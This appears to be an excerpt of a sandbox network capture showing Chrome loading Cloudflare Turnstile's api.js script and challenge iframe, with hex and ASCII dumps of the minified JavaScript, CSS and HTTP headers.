                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                        Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                        Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                                        Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.449748104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:17 UTC383OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:17 UTC441INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:17 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 47262
                                                                                        Connection: close
                                                                                        accept-ranges: bytes
                                                                                        last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                        access-control-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a5a3fe1c1a38-EWR
                                                                                        2024-10-02 15:15:17 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                        Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                        Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                        Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                        Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                        Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                        Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                        Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                        Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                        Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                                        Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.449749104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:17 UTC797OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/pbesy/0x4AAAAAAAuwoZIF13gVb7q7/auto/fbE/normal/auto/ HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-Dest: iframe
                                                                                        Referer: https://mousefarte.pro/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:17 UTC1369INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 165108
                                                                                        Connection: close
                                                                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                        referrer-policy: same-origin
                                                                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                        cross-origin-opener-policy: same-origin
                                                                                        content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                        origin-agent-cluster: ?1
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                        cross-origin-embedder-policy: require-corp
                                                                                        document-policy: js-profiling
                                                                                        2024-10-02 15:15:17 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 35 61 35 61 34 37 65 30 36 34 33 65 39 2d 45 57 52 0d 0a 0d 0a
                                                                                        Data Ascii: Server: cloudflareCF-RAY: 8cc5a5a47e0643e9-EWR
                                                                                        2024-10-02 15:15:17 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                        Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                        2024-10-02 15:15:17 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                        Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
